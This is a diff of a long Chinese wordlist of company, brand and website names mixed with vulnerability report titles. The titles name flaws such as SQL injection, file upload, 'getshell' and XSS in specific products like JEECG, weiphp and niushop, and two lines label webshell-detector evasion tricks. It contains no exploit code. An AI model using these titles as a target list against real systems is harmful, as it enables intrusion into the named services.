Destoon Dorado5框架高危漏洞 @@ -387,13 +371,13 @@ E-CRM - SQL注入两处 E-CRM - 越权漏洞 E-CRM7.6.40.2一处SQL注入 ECSHOP教程网 -ECShop/ShopEx +ECShop EC营客通 EDS会员商城 EETOP EEWORLD论坛 ELLE中国 -EMIS快速开发平台 - 任意用户密码重置(无需登陆) +EMIS快速开发平台 - 任意用户密码重置 EMIS快速开发平台两处SQL注入 EMIS快速开发平台搜索型注入 EMSHOST @@ -407,7 +391,6 @@ ETCP停车 ETF基金官网 EarCMS某功能存在存储型XSS EduWind存在存储型xss官网dome复现 -EduWind存在存储型xss官网dome复现(二) EmpireCMS7.5某处存在存储型xss Extrabux海淘返利网 E车E站 @@ -418,7 +401,6 @@ E宠商城网 E街风时尚网 E购商城订货系统任意文件上传漏洞 FANCL -FANCL(芳珂) FERRBUFF FMC FT中文网 @@ -1498,7 +1480,7 @@ HadSky轻论坛 Halo-Java博客系统存储型XSS Hishop HobbyBoss中国 -Holvoo(好乐宝)博客 +Holvoo博客 HostEase ICCGAME游戏平台 IC交易网 @@ -1513,15 +1495,14 @@ INCAKE蛋糕 IPAYLINKS IQ锐达科技 ISweek工采网 -ITMC网店(跨境)客户服务实训软件存在通用型POST注入漏洞 +ITMC网店客户服务实训软件存在通用型POST注入漏洞 +IT培训网 IT黑龙江 -IT培训网(达内机构) IXDC Intuit JEEBBS系统存在存储型跨站攻击,点开帖子就中招 JEECG开发平台存在SQL注入2 JEECG快速开发平台存在SQL注入漏洞06 -JEECG快速开发平台存在SQL注入漏洞(多个变量存在SQL注入漏洞) JEECG快速开发平台存在多个漏洞 JEECG快速开发平台存在任意文件下载漏洞 JEECG快速开发平台存在本地文件包含漏洞 @@ -1536,8 +1517,6 @@ JSPGOU店中店 v5.0版修改头像处存在存储xss JTOPCMS最新3.0版本存储型xss JYMUSIC 评论 XSS JeePlus快速开发平台一处sql注入 -Jeecg 快速开发平台 3.7.3(最新版)存在SQL注入漏洞03 -Jeecg 快速开发平台 3.7.3(最新版)存在业务逻辑漏洞 Jeecg 快速开发平台存在GET型SQL注入漏洞 Jeecg 快速开发平台存在GET型SQL注入漏洞01 Jeecg 快速开发平台存在GET型SQL注入漏洞02 @@ -1580,7 +1559,6 @@ LOFT 中国 LOOKCC眼镜网 LOWA官方旗舰店 Laysns社区系统存储型XSS漏洞 -Leanote(蚂蚁笔记)存在多处xss漏洞 Linkpeople M800 MANSORY中国官网 @@ -1598,7 +1576,6 @@ MagicMail邮件系统配置漏洞 Mao10CMS MetInfo Microsoft -Microsoft China|微软 中国 Midifan Mob官网 - 全球领先 Modoer @@ -1620,14 +1597,13 @@ Mymps分类信息系统一处任意文件删除 Mymps分类信息系统最新版前台一步步getshell NBA中国官网 NCIST -NIUSHOP B2C单商户V2.2 前台任意文件删除(演示站测试成功) +NIUSHOP B2C单商户V2.2 前台任意文件删除 NRC新零链 -NetMizer日志管理系统SQL注入漏洞(无需登录) -NetMizer日志管理系统命令执行漏洞(二) -NetMizer日志管理系统命令执行漏洞(无需登录) +NetMizer日志管理系统SQL注入漏洞 +NetMizer日志管理系统命令执行漏洞 Netgear VPN Firewall FVS318Gv2 任意文件读取漏洞 Netgear VPN Firewall FVS318Gv2&SRX5308 SQL注入漏洞 -Nexteasy云应用云开发平台SQL注入漏洞(官方演示站) +Nexteasy云应用云开发平台SQL注入漏洞 NiuShop V2.0 某处泄露用户信息 Niushop系统存在thinkphp远程代码执行漏洞 Nxt中文社区 @@ -1652,11 +1628,11 @@ OpenSNS前台危险函数绕过限制SQL注入 OpenSNS开源社交系统存在存储型XSS Oracle Osprey -PAAJCMS(PHP)版 前台无限制SQL注入漏洞 -PAAJCMS(PHP)版 前台无限制SQL注入漏洞——2 -PAAJCMS(PHP)版 前台无限制SQL注入漏洞——3 -PAAJCMS(PHP)版 前台无限制SQL注入漏洞——4 -PAAJCMS(PHP)版 前台重装漏洞与代码注入漏洞(一键getshell) +PAAJCMS版 前台无限制SQL注入漏洞 +PAAJCMS版 前台无限制SQL注入漏洞——2 +PAAJCMS版 前台无限制SQL注入漏洞——3 +PAAJCMS版 前台无限制SQL注入漏洞——4 +PAAJCMS版 前台重装漏洞与代码注入漏洞 PHPB2B PHPCMS PHPDisk @@ -1668,7 +1644,6 @@ PKPM POCO相机 PORTS宝姿中文官方网站 PPTV -PPTV(PPlive) PPT家园 PT东海 PT凯地 @@ -1706,7 +1681,7 @@ PbootCMS前台注入二 PbootCMS前台注入四 PbootCMS最新版前台一处任意代码执行 PhotoPS照片处理网官方论坛 -Polycom 通讯系统(北京)有限公司 +Polycom 通讯系统有限公司 P聚力 QQ快乐吧 QY视讯 @@ -1717,7 +1692,7 @@ REG007 ROCKOA协同办公系统两处SQL注入 ROOKIE官方商城 Regus -Robam/老板商城 +Robam Roobo S-CMS新闻门户系统存在SQL注入1 S-CMS新闻门户系统存在SQL注入2 @@ -1726,7 +1701,6 @@ SANA莎娜官方网站 SAP SCSBD校级基础数据库管理系统未授权访问漏洞导致大量学生信息泄漏 SDP软件快速开发平台 - SQL注入漏洞 -SDP软件快速开发平台 - SQL注入漏洞(二) SDP软件快速开发平台 - 多处XSS漏洞 SEMI大半导体产业网 SEO培训教程 @@ -1864,7 +1838,7 @@ SST中华A SST华发A SST天海ST天海 SST天海ST天海B -STMicroelectronics意法半导体(中国)投资有限公司 +STMicroelectronics意法半导体 STTCL ST一投 ST一纺 @@ -2693,20 +2667,20 @@ SeekPart Selleck上海 ShineWing信永中和 ShineWrite留学文书第一品牌 -Shop7z网上购物系统多处存储型XSS(demo复现) +Shop7z网上购物系统多处存储型XSS Shop7z网上商城购物系统任意密码重置漏洞 ShopBuilder ShopEx ShopNC ShopNum1 -ShopWe网店系统一处越权删除漏洞#2(demo演示) -ShopWe网店系统越权操作其他用户地址(demo证明) +ShopWe网店系统一处越权删除漏洞#2 +ShopWe网店系统越权操作其他用户地址 ShopsN SileCMS任意文件上传+GETSHELL SiteServerCMS SiteStar SketchUp坯子库 -Sngine v2.5.3 存在反射型XSS漏洞/官网Demo复现/附大量案例 +Sngine v2.5.3 存在反射型XSS漏洞 Sub HD 字幕站 SyGuestBook存在储存型xss S三九 @@ -2892,7 +2866,6 @@ TCL电子控股 TCL中国事业部 TCL集团股份有限公司 TCL科技集团股份有限公司 -TCL新技术(惠州)有限公司 THEOL THEOL网络教学综合平台 THEOL网络教学综合平台SQL注入漏洞 @@ -2913,7 +2886,7 @@ ThinkCMF ThinkCSS网 ThinkLC ThinkLC分类信息系统前台一处sql注入漏洞 -ThinkLC分类信息系统前台一处update注入(需注册会员) +ThinkLC分类信息系统前台一处update注入 ThinkSAAS ThinkSNS Tigo金泰克 @@ -2922,7 +2895,7 @@ TinyShop V3.0 前台无限制SQL注入 TopJUI前端框架SQL注入#2 TopJUI前端框架一处SQL注入 U8基金网 -UCML应用框架平台XXE漏洞(官方dome) +UCML应用框架平台XXE漏洞 UCML应用框架平台注入漏洞绕过安全限制 UPS应用网 UU头条 @@ -2950,11 +2923,11 @@ Win7en乐园网络资讯 WinWebMail WinWebMail邮件系统 X5工程项目管理系统XXE漏洞 -X5工程项目管理系统两处SQL注入(demo演示) -X5工程项目管理系统一处XXE漏洞(demo演示) +X5工程项目管理系统两处SQL注入 +X5工程项目管理系统一处XXE漏洞 X5工程项目管理系统任意文件上传 XYCMS留言板PHP版 v1.9一处目录遍历 -XYCMS留言板PHP版v1.8(最新版)SQL注入 +XYCMS留言板PHP版v1.8 YESIDO YGOPRO中文网 YOKA时尚网 @@ -2974,8 +2947,6 @@ ZKTime Web 任意SQL语句执行 ZWHR Zealer Zoomla -[IoT安全] 动车监控摄像头存在安全漏洞 -[乐居] 乐居一处较严重 a963 abbs abbs建筑论坛 @@ -3148,19 +3119,6 @@ hillstone hongdefund.com houxue.com hsqcx.com -htc -http://4006660407.com -http://andpay.me -http://asthis.net -http://cenwor.com -http://cli.im -http://game214.com -http://lhub.cn -http://otcms.com -http://taozuim.com -http://tinyrise.com -http://www.iyzone.com/ -http://zhenzhixuan.com huhu网络营销博客 hyd.so hzbank @@ -3219,7 +3177,7 @@ jeecg快速开发平台任意文件读取2 jeecg快速开发平台任意代码执行3 jeecg快速开发平台任意代码执行4 jeecg快速开发平台任意代码执行5 -jeecms最新版后台获取shell(三种方法),附一处任意文件读取漏洞 +jeecms最新版后台获取shell jeesns存储型XSS jeewx逻辑缺陷 jeewx任意代码执行 @@ -3229,7 +3187,7 @@ jspgou单店版v6.0系统修改头像处存在存储xss jspgou单店版v6.0系统收货地址处存在存储xss jspgou单店版v6.0系统越权删除任意用户订单 jspxcms存储型XSS,精准打后台 -jxstar云开发平台越权越权漏洞(官方demo) +jxstar云开发平台越权越权漏洞 k76漫画盒子 kaiyuanhotels.com keepc.com @@ -3263,7 +3221,7 @@ lubanu.com m1080高清电影网 maccms macx.cn -make up for ever(路威酩轩香水化妆品(上海)有限公司) +make up for ever maododo.com maxxipoint.com mba中国网 @@ -3297,12 +3255,12 @@ neworldgroup.org nexus中文网 niushop 2.2最新版sql注入+用户信息泄露 niushop b2c单商户v2.2 前台文件上传2 -niushop b2c单商户v2.2 任意远程文件下载导致getshell(演示站测试成功) -niushop getshell(无任何限制) +niushop b2c单商户v2.2 任意远程文件下载导致getshell +niushop getshell niushop_b2c_free 2.2开源商城存在任意文件删除漏洞 niushop任意文件删除 +niushop某处任意代码执行 niushop商城系统前台存在任意getshell漏洞 -niushop某处任意代码执行(官方demo测试成功) no.cn nod32 oalib期刊 @@ -3403,7 +3361,6 @@ tpAdmin后台管理系统-代码执行漏洞 tpshop201812sql注入 turbocms Jws注入 turbocms 任意文件上传 -turbocms 任意文件上传(潜在命令执行风险) turbocms 任意文件上传2 twt企业IT交流平台 tyredcross @@ -3425,12 +3382,10 @@ wacai weimob weiphp 4.0 8处注入打包 weiphp 4.0 8处注入打包。 -weiphp 4.0 前台SQL注入(官网复现 ) -weiphp 4.0 前台SQL注入(官网复现) -weiphp 4.0 前台无限制getshell(官网复现 -weiphp 4.0 前台无限制getshell(官网复现) +weiphp 4.0 前台SQL注入 +weiphp 4.0 前台无限制getshell weiphp4.0 前台2处getshell打包 -weiphp4.0 前台无限制SQL注入(官网复现) +weiphp4.0 前台无限制SQL注入 weiphp4.0 一处高危逻辑漏洞 weiphp4.0前台SQL注入 weiphp4.0一处getshell @@ -3451,15 +3406,15 @@ weiphp5.0最新版一处文件读取#1 weiphp5.0最新版一处文件读取#2 weiphp一处getshell weiphp一处getshell#2 +weiphp越权修改帖子 +weiphp越权删除评论 weiphp任意密码重置#5 weiphp数据库任意信息泄露 -weiphp微信平台前台无限制直接getshell(官网演示) -weiphp越权修改帖子(官网复现) -weiphp越权删除评论(官网复现) +weiphp微信平台前台无限制直接getshell wepiao.com whatever whatsns -wifi共享精灵(南京同享网络科技有限公司) +wifi共享精灵 willshop win764位系统下载站 win7旗舰版 - 最好 @@ -3581,6 +3536,7 @@ zstu 东盛 东睦 东软 +东陶 丝绸 中企 中信 @@ -3590,6 +3546,7 @@ zstu 中化 中原 中商 +中国 中基 中大 中天 @@ -3622,6 +3579,7 @@ zstu 中达 中远 中通 +中道 中金 中铁 中铅 @@ -3667,13 +3625,16 @@ zstu 人类 亿利 亿城 +仁和 仙鹤 伊利 众和 +优估 优信 优效 伟星 传化 +伽蓝 佛塑 佛照 佳人 @@ -3773,6 +3734,7 @@ zstu 华银 华阳 华靖 +协鑫 卓博 南化 南天 @@ -3797,6 +3759,7 @@ zstu 博雅 卧龙 卫星 +卫材 原水 厦华 厦工 @@ -3828,6 +3791,7 @@ zstu 唐狮 唐钢 唱吧 +嗨皮 嘉宝 嘉陵 四创 @@ -3899,6 +3863,7 @@ zstu 好买 威孚 威尔 +威莱 威达 威远 宁沪 @@ -3935,6 +3900,7 @@ zstu 尊贷 小店 尖峰 +尚友 尚纬 山推 山焦 @@ -3947,6 +3913,7 @@ zstu 巨化 巨轮 币虎 +布比 常山 常林 常柴 @@ -3961,6 +3928,7 @@ zstu 广船 广药 广钢 +库币 康佳 康缘 康美 @@ -3975,6 +3943,7 @@ zstu 张裕 强生 彩虹 +彪马 得亨 微拍 微擎 @@ -3993,6 +3962,7 @@ zstu 恒瑞 恒生 恒顺 +悦昌 惠天 惠普 惠泉 @@ -4008,6 +3978,7 @@ zstu 抱抱 招行 拜克 +拜耳 挖财 振华 捷利 @@ -4034,6 +4005,7 @@ zstu 方兴 方大 旋风 +日产 旭飞 时代 昂立 @@ -4041,12 +4013,14 @@ zstu 昌九 昌河 明天 +明纬 明胶 易班 星云 星湖 星马 映客 +春云 春兰 春晖 晋西 @@ -4066,10 +4040,12 @@ zstu 机电 权威 杉杉 +李宁 杨涛 杭萧 杭钢 林海 +柏莼 柳化 柳工 标准 @@ -4089,8 +4065,10 @@ zstu 橙网 欣网 欣龙 +欧尚 歌华 歌尔 +正大 正虹 武商 武控 @@ -4139,6 +4117,7 @@ zstu 洽客 测试 济钢 +浙旅 浦发 浦建 浪奇 @@ -4289,6 +4268,7 @@ zstu 联合 联环 联通 +聚诚 聚龙 胜利 腾讯 @@ -4311,6 +4291,7 @@ zstu 莱茵 菲达 萌兔 +萨科 蒙牛 蒙电 蓝鸥 @@ -4321,6 +4302,7 @@ zstu 襄轴 西单 西旅 +西普 西水 西煤 西药 @@ -4348,6 +4330,7 @@ zstu 赣能 起步 超声 +跑街 轮胎 软控 轴研 @@ -4442,14 +4425,19 @@ zstu 闪送 闽电 阳光 +阿仁 隆平 隧道 +雀巢 +雀氏 雅座 雷鸣 震元 +震旦 霞客 露露 青松 +青牛 靖煤 鞍钢 韵升 @@ -4457,6 +4445,7 @@ zstu 韶钢 顺鑫 领先 +颐海 风华 风帆 风神 @@ -4496,56 +4485,6 @@ zstu 贝腾 - 中国创新创业实践教育领导厂商 爱快 iKuai 闪艺 所属公司厦门礼之家网络科技有限公司 -滋源(SEEYOUNG)官方网站 -尚友(ShareWithU) -腾达(Tenda) -金地(集团) -凯撒(中国)文化 -开州(开县)人才网 -万全(医药)控股集团 -乐普(北京)医疗器械 -太龙(福建)商业照明 -特步(中国)有限公司 -视觉(中国)文化发展 -运盛(上海)医疗科技 -元翔(厦门)国际航空港 -华懋(厦门)新材料科技 -中国(太原)煤炭交易中心 -伽蓝(集团)股份有限公司 -复地(集团)股份有限公司 -小松(中国)投资有限公司 -山善(上海)贸易有限公司 -库柏(宁波)电气有限公司 -明纬(广州)电子有限公司 -虫星(北京)科技有限公司 -金地(集团)股份有限公司 -青牛(北京)技术有限公司 -马钢(集团)控股有限公司 -中国(长春)国际汽车博览会 -东南(福建)汽车工业有限公司 -中国(福建)国际贸易单一窗口 -亚朵(上海)酒店管理有限公司 -伟肯(中国)电气传动有限公司 -凯撒(中国)文化股份有限公司 -弘付(北京)数据科技有限公司 -金丰(中国)机械工业有限公司 -隐马(上海)健康科技有限公司 -首家(上海)电子商务有限公司 -鹭燕(福建)药业股份有限公司 -国旅(深圳)国际旅行社有限公司 -乐普(北京)医疗器械股份有限公司 -太龙(福建)商业照明股份有限公司 -微贷(杭州)金融信息服务有限公司 -视觉(中国)文化发展股份有限公司 -运盛(上海)医疗科技股份有限公司 -运盛(成都)医疗科技股份有限公司 -中国(河南)自由贸易试验区开封片区 -中国(福建)自由贸易试验区平潭片区 -元翔(厦门)国际航空港股份有限公司 -华懋(厦门)新材料科技股份有限公司 -学大(厦门)教育科技集团股份有限公司 -中国(四川)自由贸易试验区川南临港片区中介超市 -百科*问答 五羊--本田摩托 科达-DVR接入网关系统任意文件下载漏洞 环信-IM即使通信 @@ -4553,10 +4492,10 @@ zstu 墨加-因知识 理财-股城网 一汽-大众奥迪官网 -中兴-沈阳商业大厦(集团) -中兴-沈阳商业大厦(集团)股份有限公司 +中兴-沈阳商业大厦 艺盘-艺术品交易大盘 一汽-大众汽车有限公司 +中兴-沈阳商业大厦股份有限公司 平塘.金盆网 山东001在线 快递100 @@ -4598,7 +4537,7 @@ zstu 长油5 环球56在线 早教700网 -帆软7版本某处存在任意文件操作漏洞(补充) +帆软7版本某处存在任意文件操作漏洞 中国86货车网 黄页88 鞍山8890政务便民服务平台 @@ -4675,14 +4614,14 @@ zstu 云优CMS存在命令执行漏洞 齐博CMS图片系统无限刷分漏洞 齐博CMS整站系统前台某两处存在存储型XSS攻击 +齐博CMS整站系统最新版某处存在文件包含漏洞 齐博CMS整站系统最新版前台上传漏洞导致存储型XSS产生 -齐博CMS整站系统最新版某处存在文件包含漏洞(文末用官网做证明) 全程DRP进销存系统4处SQL注入漏洞 康盛Discuz 框架Dorado5某接口SQL注入漏洞 -框架Dorado5文件读取/目录列表 +框架Dorado5文件读取 框架Dorado5任意文件读取 -泛普ERP管理系统 - sql注入 :( +泛普ERP管理系统 - sql注入 : 泛普ERP管理系统 - 五处sql注入 泛普ERP管理系统 - 多处存储型XSS漏洞 泛普ERP管理系统一处getshell @@ -4698,9 +4637,8 @@ zstu 宁波GQY视讯 宁波GQY视讯股份有限公司 富博H5游戏研发网 -全程HMS系统(官方demo)多处SQL注入 -全程HMS系统(官方demo)多处SQL注入2 -全程HMS系统操作其他用户地址(demo复现) +全程HMS系统 +全程HMS系统操作其他用户地址 全程HR管理系统5处SQL注入 儒思HR人力资源网 中视IT88户外光学商城 @@ -4709,28 +4647,28 @@ zstu 美素MAYSU官网 中国MBA教育网 我要MP3铃声下载站 +宝创MSA网管管理系统任意文件下载 宝创MSA网关管理系统任意文件读取漏洞 -宝创MSA网管管理系统任意文件下载(无需登录) 高清MV 松下NB-IoT产品定位系统 启莱OA 泛微OA 通达OA -极限OA 2017版 - SQL注入(demo演示) -极限OA 2017版 - 越权漏洞2 (demo演示) -极限OA 2017版 - 越权漏洞(demo演示) -极限OA(官方演示站)协同管理平台存储型XSS两处 +极限OA 2017版 - SQL注入 +极限OA 2017版 - 越权漏洞 +极限OA 2017版 - 越权漏洞2 全程OA-OM系统多处越权操作&存储型XSS【Demo演示】 全程OA系统 璐华OA八处注入 全程OA协同管理平台SQL注入漏洞 +极限OA协同管理平台存储型XSS两处 天翎OBPM - 多处SQL注入漏洞 全程OM云平台系统SQL注入 2 全程OM云平台系统SQL注入漏洞 裴讯PHICOMM -全程PM项目管理系统(官方)SQL注入漏洞 +全程PM项目管理 全程PM项目管理系统4处SQL注入 -全程PM项目管理(官方演示站)SQL注入2 +全程PM项目管理系统SQL注入漏洞 丽格REGAL官方网站 赛捷SAGE数据库SQL注入漏洞 赛捷SAGE数据库SQL注入漏洞 2 @@ -4780,7 +4718,7 @@ zstu 苹果cms 逐浪cms 齐博cmsb2b商城系统存在一处xss -助创cms越权查看+修改其他用户收货地址(demo复现) +助创cms越权查看+修改其他用户收货地址 织梦cms最新后台getshell 织梦cms最新后台getshell2 织梦cms最新后台getshell3 @@ -4796,12 +4734,12 @@ zstu 齐博cms下载系统推广积分无限刷 齐博cms分类系统标签处存在存储xss 宝贝dj网 +宏景eHR-V7.1 SQL注入 宏景eHR-V7.1 SQL注入#3 -宏景eHR-V7.1 SQL注入(base64编码) 宏景eHR-V7.1SQL注入编码绕过#2 +宏景eHR-V7.1一处SQL注入 宏景eHR-V7.1一处SQL注入#2 -宏景eHR-V7.1一处SQL注入(编码绕过) -宏景eHR-V7.1一处任意目录打包下载(补充) +宏景eHR-V7.1一处任意目录打包下载 票友erp 党员e家 好车e贷 @@ -4821,9 +4759,9 @@ zstu 老歌mp3 极限oa - SQL注入 泛普oa - 越权漏洞 +极限oa一处SQL注入 极限oa一处SQL注入#2 极限oa一处SQL注入#3 -极限oa一处SQL注入(布尔型绕过) 小微oa前台sql注入 信呼oa系统,任意文件上传getshell 信呼oa系统登陆逻辑绕过,可登录管理员 @@ -4846,6 +4784,7 @@ zstu 一心堂 一米鲜 一财网 +一起走 一起飞 七一二 七一网 @@ -5006,13 +4945,16 @@ zstu 亿利达 亿商网 亿嘉和 +亿爱思 亿览网 今世缘 今麦郎 仪众网 任子行 +任我游 企信网 企库网 +企查查 企翼网 伊之密 伊力特 @@ -5027,6 +4969,7 @@ zstu 优学派 优学通 优家购 +优悠游 优购网 优配网 优集品 @@ -5047,6 +4990,7 @@ zstu 便宜玩 便民网 保千里 +保家网 保龄宝 信用宝 信立泰 @@ -5080,6 +5024,7 @@ zstu 养生堂 养老网 兼职网 +内科大 农一网 农产品 农商通 @@ -5118,6 +5063,7 @@ zstu 医元网 医才网 医方明 +医科达 十九楼 千库网 千游网 @@ -5184,6 +5130,7 @@ zstu 合三洋 合优网 合力泰 +合力贷 合浦网 合百大 合肥美 @@ -5208,6 +5155,7 @@ zstu 哇靠团 哈三联 哈尔斯 +哈工程 哈工网 哈牛网 哈空调 @@ -5238,16 +5186,19 @@ zstu 园林吧 固始网 固特异 +国家级 国泰安 国科微 国药网 圆才网 土巴兔 圣济堂 +圣罗兰 圣莱达 地图汇 地球城 地球村 +坎德拉 型尚网 埃斯顿 堆糖网 @@ -5344,9 +5295,11 @@ zstu 好贷网 好车网 如意购 +如斯网 妈咪爱 妈妈网 妈妈说 +威可楷 威尔泰 威派格 威盘网 @@ -5412,6 +5365,7 @@ zstu 小商品 小布叮 小鹅通 +尚客圈 尼玛搜 山村网 山河网 @@ -5507,6 +5461,7 @@ zstu 报纸网 拇指玩 拉卡拉 +拓吉凯 拓尔思 拓斯达 拔草啦 @@ -5517,6 +5472,7 @@ zstu 挑号网 挪亚家 振华科 +捷安特 掌上宝 探羊网 探路者 @@ -5713,6 +5669,7 @@ zstu 楼盘网 欣旺达 欧比特 +欧美嘉 欧莱雅 欧菲光 歌力思 @@ -5753,6 +5710,7 @@ zstu 沪机场 沪江网 沭阳网 +河工大 法尔胜 法搜网 泸天化 @@ -5832,6 +5790,7 @@ zstu 渝开发 渝路桥 渤商宝 +港中旅 游久网 游侠客 游侠网 @@ -5879,6 +5838,7 @@ zstu 爱施德 爱旅行 爱柯迪 +爱森斯 爱模型 爱游戏 爱空间 @@ -5934,6 +5894,7 @@ zstu 璞泰来 甘咨询 生意宝 +生活家 甬成功 甲骨文 申地铁 @@ -5967,6 +5928,7 @@ zstu 百词斩 百谷网 皮阿诺 +盈信通 盈方微 益鑫泰 盐田港 @@ -5994,6 +5956,7 @@ zstu 神奇股 票牛网 福斯特 +福腾宝 福莱特 秀人网 秀动网 @@ -6055,6 +6018,7 @@ zstu 红太阳 红娘网 红宝丽 +红杉树 红蜻蜓 纳思达 纳金网 @@ -6122,6 +6086,7 @@ zstu 自修家 自学岛 自然堂 +自由岛 至善网 致设计 舒泰神 @@ -6195,6 +6160,7 @@ zstu 衣联网 装乐宝 西洋汇 +西门子 要出发 视界网 解放号 @@ -6241,12 +6207,14 @@ zstu 超越网 超频三 趋势网 +趣分期 趣游网 趣色网 跟谁学 跨境通 跨考网 踏得网 +车主邦 车云网 车享网 车保网 @@ -6325,6 +6293,7 @@ zstu 金瑞矿 金盘网 金窝网 +金联储 金莱特 金融号 金融界 @@ -6458,34 +6427,8 @@ zstu G洪城 中国网 • 中部纵览 十六番 旅行者社区 -北京市 八方电信工程(集团)有限公司 +北京市 八方电信工程有限公司 山东省"123农廉工程"威海在线 -保家网(X团装修网) -爱迪尔(adel)集团 -如斯网(asthis.net) -惠而浦(中国) -飞亚达(集团) -黑牡丹(集团) -好利来(中国)电子科技 -斯得雅(中国)有限公司 -舒泰神(北京)生物制药 -西铁城(中国)官方网站 -东海堂(饼屋)食品有限公司 -亚速旺(上海)商贸有限公司 -惠而浦(中国)股份有限公司 -西铁城(中国)钟表有限公司 -飞亚达(集团)股份有限公司 -黑牡丹(集团)股份有限公司 -和家网(上海)信息技术有限公司 -支付宝(杭州)信息技术有限公司 -爱爱网(深圳)电子商务有限公司 -生活家(北京)家居装饰有限公司 -科乐得(武汉)技术股份有限公司 -中电网(北京)电子科技发展有限公司 -同业云(上海)人工智能科技有限公司 -好利来(中国)电子科技股份有限公司 -舒泰神(北京)生物制药股份有限公司 -商品街(原伍折网) 高校邦+后台登陆认证缺陷导致全部高校信息泄露 赏花阁--长沙鲜花网 锦上路-跨境全日通 @@ -6576,11 +6519,9 @@ zstu 苏常柴B 茉织华B 地平线CMS -好得很CMS(hdhcms)存在前台SQL注入漏洞 -好得很CMS(hdhcms)存在前台无限制SQL注入漏洞 -一网云CMS重置任意账号密码(demo复现) -销售易CRM存在存储型XSS(三) -销售易CRM存在存储型XSS(二) +好得很CMS +一网云CMS重置任意账号密码 +销售易CRM存在存储型XSS 高音质DJ音乐盒网站 拼接过D盾 编码过D盾 @@ -6589,14 +6530,10 @@ zstu 金豪漾ERP 经济通ETNet 医指通EZT网站 -冠军(KEMP)运动地板有限公司 -跑街(PURCHA)自贸试验区进口商品直购中心 安全狗SRC -东陶(TOTO)中国有限公司 -腾达(Tenda) 圣罗兰VSL中国官网 艺术家_环球收藏网 -浙里办app(浙江政务服务网) +浙里办app 某学报cms在edu网站广泛使用存在漏洞 一网云cms人才系统前台一键getshell 慧教云cms存在任意文件上传漏洞配合目录穿越可getshell @@ -6722,11 +6659,13 @@ zstu 三德科技 三星医疗 三星新材 +三星集团 三晖电气 三普药业 三木集团 三林中国 三枪内衣 +三樱包装 三毛派神 三江购物 三泰控股 @@ -6769,6 +6708,7 @@ zstu 上汽集团 上海三毛 上海世茂 +上海丰华 上海临港 上海九百 上海亚虹 @@ -6783,6 +6723,7 @@ zstu 上海在线 上海地铁 上海城投 +上海外服 上海大学 上海天洋 上海家化 @@ -6802,6 +6743,7 @@ zstu 上海沪工 上海洗霸 上海海关 +上海海立 上海瀚讯 上海热线 上海物贸 @@ -6828,12 +6770,15 @@ zstu 上海钢联 上海银行 上海雅仕 +上海龙头 上港集团 +上田商工 上音票务 上风高科 世名科技 世嘉科技 世界之最 +世界直销 世界网络 世纪中天 世纪中税 @@ -6922,6 +6867,7 @@ zstu 东方钽业 东方铁塔 东方银星 +东方银谷 东方锆业 东方集团 东方雨虹 @@ -7085,6 +7031,7 @@ zstu 中国石油 中国神华 中国科传 +中国移动 中国纺机 中国联通 中国船舶 @@ -7113,6 +7060,7 @@ zstu 中大期货 中大网校 中大股份 +中大英才 中天人力 中天企业 中天城投 @@ -7158,6 +7106,7 @@ zstu 中捷资源 中控智慧 中控集团 +中教畅享 中文传媒 中文在线 中文百科 @@ -7254,6 +7203,7 @@ zstu 中粮资本 中粮集团 中纺投资 +中经互联 中缆科技 中网名医 中联重科 @@ -7292,6 +7242,7 @@ zstu 中讯科技 中设股份 中设集团 +中证金牛 中贝通信 中财集团 中超控股 @@ -7323,6 +7274,7 @@ zstu 中铁七局 中铁二局 中铁二院 +中铁五局 中铁八局 中铁十局 中铁工业 @@ -7417,6 +7369,7 @@ zstu 书林文学 书海小说 书生电子 +书香门第 乳山热线 乾景园林 乾照光电 @@ -7501,6 +7454,7 @@ zstu 交控科技 交运股份 交通银行 +亨特陶业 亨通光电 京东商城 京东方A @@ -7543,10 +7497,12 @@ zstu 亿安科技 亿帆医药 亿帆鑫富 +亿恒讯通 亿恩科技 亿晶光电 亿纬锂能 亿联网络 +亿腾医药 亿通科技 亿阳信通 什马金融 @@ -7581,6 +7537,7 @@ zstu 众享福励 众信旅游 众兴菌业 +众升财富 众合机电 众合科技 众应互联 @@ -7604,6 +7561,7 @@ zstu 传化集团 传智播客 传漾科技 +传神联合 传艺科技 传音控股 伽蓝集团 @@ -7633,6 +7591,7 @@ zstu 佳隆股份 供销大集 依云水疗 +依波精品 依美集团 依顿电子 侨银环保 @@ -7748,6 +7707,7 @@ zstu 光明乳业 光明地产 光明日报 +光明食品 光正集团 光洋股份 光环国际 @@ -7760,6 +7720,7 @@ zstu 克明面业 克来机电 克莉丝汀 +克莱斯勒 克顿传媒 免税易购 兖州煤业 @@ -7777,6 +7738,7 @@ zstu 全纳车网 全通教育 八一钢铁 +八方电气 八方股份 八菱科技 公用科技 @@ -7846,6 +7808,7 @@ zstu 凌讯网络 凌钢股份 凌霄泵业 +凡客诚品 凤凰传媒 凤凰光学 凤凰游戏 @@ -7861,6 +7824,7 @@ zstu 凯撒文化 凯撒旅游 凯文教育 +凯新认证 凯普生物 凯盛科技 凯美特气 @@ -7876,6 +7840,7 @@ zstu 创业环保 创业黑马 创元科技 +创兴动力 创兴科技 创兴置业 创兴资源 @@ -7886,6 +7851,7 @@ zstu 创意信息 创成装饰 创新医疗 +创智汇德 创源文化 创维数字 创维集团 @@ -7911,6 +7877,7 @@ zstu 力合科技 力合股份 力学学报 +力帆实业 力帆股份 力帆集团 力星股份 @@ -7926,6 +7893,7 @@ zstu 动软卓越 劲嘉股份 劲拓股份 +劲旅兴业 劲胜智能 劲胜精密 势航网络 @@ -7968,6 +7936,7 @@ zstu 北人股份 北化股份 北华大学 +北外在线 北外网课 北大医药 北大青鸟 @@ -8010,6 +7979,7 @@ zstu 千足珍珠 千里眼网 千金药业 +千钧万博 千锋教育 升华拜克 升维动力 @@ -8068,6 +8038,7 @@ zstu 华夏银行 华大北斗 华大基因 +华大天元 华天科技 华天酒店 华媒控股 @@ -8123,7 +8094,9 @@ zstu 华润万东 华润三九 华润双鹤 +华润燃气 华润生化 +华润置地 华润锦华 华润集团 华源发展 @@ -8139,6 +8112,7 @@ zstu 华电国际 华电能源 华电重工 +华硕电脑 华神集团 华立控股 华立科技 @@ -8304,6 +8278,7 @@ zstu 博思软件 博敏电子 博晖创新 +博朗泰华 博汇纸业 博洋集团 博济医药 @@ -8373,6 +8348,7 @@ zstu 双虎家私 双象股份 双钱股份 +双钱集团 双鹤药业 双鹭药业 双齐国际 @@ -8419,6 +8395,7 @@ zstu 吉家江寓 吉峰科技 吉德官网 +吉林亚泰 吉林制药 吉林化纤 吉林大学 @@ -8441,6 +8418,7 @@ zstu 吉鑫科技 同为股份 同人华塑 +同力天合 